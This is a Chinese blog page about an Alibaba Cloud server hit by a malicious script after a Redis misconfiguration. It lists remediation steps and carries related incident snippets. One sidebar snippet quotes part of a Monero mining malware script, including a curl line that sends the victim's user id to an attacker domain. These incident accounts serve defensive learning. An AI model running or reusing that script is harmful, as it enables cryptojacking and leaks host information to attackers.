因为操作失误—导致阿里云服务器被执行恶意脚本问题

最新推荐文章于 2025-03-21 15:25:02 发布
最新推荐文章于 2025-03-21 15:25:02 发布
阅读量1.3k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 帮助陌生人少走弯路 文章标签: 阿里云 服务器 云计算
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_40572023/article/details/121890103
本文详细记录了一次由于误操作导致阿里云服务器被植入恶意脚本的问题及其解决过程。从权限配置错误开始,通过重置云盘、绑定密钥对、设置安全组规则、云监控等九个步骤,全面阐述了如何排查和修复服务器安全问题,确保服务器安全稳定运行。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

失误的操作是ridis中的配置权限
参照文章,看你有没有中奖

解决一:

有能力直接处理掉相应问题,这里自行百度

解决二:

重置云盘

解决三:

绑定密钥对

  • 绑定完要重启【重点】
  • 用密钥对 SSH 连接 ECS 实例【原文链接
    在这里插入图片描述

解决四:

设置安全中那些个人设置(不建议开登录掩码)

  • 可能出现的问题:阿里云设置登录掩码错误无法登录【原文链接

解决五:

设置:云监控-主机插件状态

解决六:

<
最低0.47元/天 解锁文章

200万优质内容无限畅学
阿里云设置登录掩码无法登录
JAVA000011的博客
06-21 689
前段时间因为操作失误,导致阿里云服务器执行恶意脚本,也是现学现用的处理后续的这些问题,同时也是因为尝试所以就设置了 这个登录掩码.那么什么是登录掩码
对象存储OSS 客户端签名直传的安全风险和解决方法
qq_33163046的博客
06-07 3521
本文探讨了OSS客户端签名直传的安全风险及解决方法。我们对比了OSS与文件系统,分析了客户端直传的风险,并提出了多种解决方案,如服务端生成STS临时访问凭证和签名URL。通过A企业案例展示了实际应用效果,并提供了多种OSS安全最佳实践。希望本文能帮助读者更好地理解和应对OSS的安全挑战,保护数据安全。
阿里云安全恶意程序检测-数据集
03-20
security_submit.csv security_train.zip security_test.zip
阿里云恶意脚本执行,疑似挖矿
weixin_46531837的博客
01-10 986
服务器阿里云恶意脚本,挖矿
记一次阿里云执行恶意脚本
weixin_45925840的博客
05-29 1032
由于排查时忘记截图了。。。所以就纯文字 1 遇事第一步先重启,发现马上就100%那肯定是定时任务或开机自动执行的脚本 2 看定时任务 3 crontab -l 删除 crontab -e 删除 4 没权限 chattr 5 使用charttr也不行,chattr命令被删了 6 find / -name chattr 7 把chattr移回 mv charttr /usr/bin 8 解锁 chattr -ai /var/spool/cron/root 9 sudo......
阿里云服务器恶意脚本攻击的解决过程
hide-on-bush的博客
05-08 6286
1.阿里云服务器恶意脚本攻击(挖矿脚本),导致cpu被打满,服务器卡顿,根本无法使用 2.使用top查看各进程的内存和cpu使用情况,找到对应耗内存和cpu的进程id 3.原本想使用kill -9 pid 杀掉对应进程,结果杀掉之后,立马自动重新开启了一个进程; 4.使用 ll /proc/pid 查看进程的运行路径,各路径表示信息如下: cwd符号链接的是进程运行目录; exe符号连接就是执行程序的绝对路径; cmdline就是程序运行时输入的命令行命令; environ记录了进程运行时的环境变量; f
阿里云ECS恶意代码执行
Wqiccc的博客
08-23 2399
小白在服务器上跑redis刚开始没有设置密码,服务器被入侵了,试了很久都没用。求大佬帮忙。。。。
【效率提升】:CentOS 7阿里云yum源策略与软件安装优化
[【效率提升】:CentOS 7阿里云yum源策略与软件安装优化](https://storage.googleapis.com/static.configserverfirewall.com/images/linux/yum-plugin-priorities-base-repo-2.png) # 摘要 本文以CentOS 7为背景,...
织梦CMS 手机访问域名 被 恶意跳转 解决方案 安全设置
03-09
确保关键目录如/data/、/uploads/等不可执行,避免攻击者上传恶意脚本。同时,检查.htaccess或nginx配置文件是否有异常的重定向规则。 第四步,数据库检查。恶意跳转可能是通过数据库注入的,比如在系统配置表中...
解决阿里云服务器出现恶意脚本代码执行问题
最新发布
Panda_Panda博客
03-21 784
执行了可疑脚本,很可能攻击者在系统的计划任务中植入了恶意条目。我们需要彻底检查系统的crontab,并删除所有恶意的定时任务。出现 “Operation not permitted” 的原因很可能是。另外,如果所在目录也被设了不可变属性,需要对目录也执行一次。这是恶意程序常用的手段之一,防止管理员修改或删除它。如无输出,说明当前 root 的计划任务已被清空。,表示该文件被设置了不可变(immutable)如果提示权限错误,确保你是以。:确认进程PID后,使用。如果输出的属性中包含。4.验证是否成功删除。
阿里云服务器被入侵执行MoneroOcean(门罗币)挖矿脚本
热门推荐
weixin_54071027的博客
06-26 1万+
为学习使用Redis,在阿里云Linux服务器上安装了redis并且后台运行,开放了默认端口,而且没有设置访问密码,当天晚上被执行恶意脚本。 恶意代码如下,分享一下: #!/bin/bash us=$(id) curl "http://oracle.zzhreceive.top/b2f628/idcheck/$us" >>/dev/null ulimit -n 65535 export MOHOME=/usr/share mkdir $MOHOME -p if [ -f "$MOHOME/[
解决阿里云服务器被植入挖矿脚本过程
拽着尾巴的鱼儿的博客
06-21 5502
基于学习的便利性,在阿里云服务中购买了云服务器,但是突然被告警提示被挖矿,而且要在一定期限内解决挖矿问题,否则就会被关停服务,本篇对于其处理过程进行一个记录,可能对于挖矿的处理也不全面,欢迎各路大神进行评论交流。以上就是今天要讲的内容,本文仅仅简单记录了处理服务器挖矿的流程,记录的不全面,欢迎各路大神探讨交流。
阿里云服务器被恶意程序攻击
qq_31755183的博客
10-29 3283
进日收到阿里云发来的报警信息,有台大数据服务器被恶意程序攻击,导致服务器的CUP、内存增高,之前处理过这种问题,处理的办法不是很理想,隔了一段时间又出现此类问题。在此总结一下: 导致此类事件的原因包括: 服务器的端口对外开放,黑客利用这些端口的漏洞来入侵服务器服务器的账号密码过于简单,被黑客暴力破解入侵服务器解决问题的办法如下: 连接服务器找到恶意程序进程杀掉; 删掉恶意进程文件; 将对应执行恶意程序的用户也清除掉; 清除系统计划任务中.
Solr服务,阿里云报警说是发现了漏洞,文件中包含WebShell代码
一个程序员的专栏
06-16 640
我查看了log里面的内容(中文显示乱码),记录了我们这个分片上的索引添加的一些内容,很奇怪的是里面竟然有异常信息,感觉像是我们的爬虫程序执行了一个API的接口调用,接口调用失败然后报了异常,我猜测这也导致了这个log文件的状态出现了异常,所以solr一直没有更新这个log。请注意,Tlog文件是可选的,并且可以在Solr配置中禁用。我们的场景是数据采集后存储在Solr里面,所以tlog里面记录了对索引的操作,采集的内容里面有WebShell代码,特别是一些技术类博客的内容,里面有代码块。
【错误汇总】阿里云创建邮件告警 python 脚本,执行超时
changshou6634的博客
07-04 588
现象:做了一个邮件告警脚本,python 写的,名称 mail.py,内容如下 #!/usr/bin/python #coding:utf-8 import smtplib from email.mime.text import MIMEText import sys mail_user = 'admin@axxxxxxxxxxx.cn' mail_pass = '8xxxxxxxxxxxxj...
实战|应急响应之某公司的粗心导致网站被恶意篡改
li49665的博客
11-17 1406
首发于奇安信攻防社区 文章地址:https://forum.butian.net/share/874 一、事件说明 一日,某公司接到来自监管单位的通报,表示该公司的网站存在S情违规内容......于是乎我又得出发了,先是向客户要到了网站的地址先看看哪里存在违规的内容,滋补小铺一顿乱翻网站上的子页面都显示正常,回到首页按下F12果然网站的关键字标签那被修改了。 二、现场处置 拧着我的小电驴到达现场后,开始跟负责网站的管理员进行谈话了解当前的网络情况,当前网站呢是部署在四川西部
阿里云服务器报警-进程异常行为-访问恶意下载源
古天乐本乐的博客
08-20 1950
分享一个自己关于阿里云服务器告警解决方法
OSS防止恶意被刷
xiangzaixiansheng的博客
10-09 8634
OSS和CDN都是一些常用的通过流量计费的,如果被恶意刷新将会造成一些不必要的财产损失。本文主要记录一些关于阿里云的oss的防刷措施。首先我们分两种情况来排查:1、恶意referer访问2、恶意ip库脚本刷新。
阿里云ECS运维:恶意程序告警及处理过程
jerryzhou的博客
09-17 4736
接上篇:ECS CPU突然告警,处理无效后重启了ECS实例。在这之后运行几天后,ECS告警有异常,登录后定位到3个文件 共有2个蠕虫病毒,1个恶意程序 恶意程序C:/Windows/SysWOW64/config/systemprofile/AppData/Roaming/NetworkLocationAwarenes/NetworkLocationAwarenes.exe 蠕虫病毒 C:/Wi...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

狂野小白兔

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值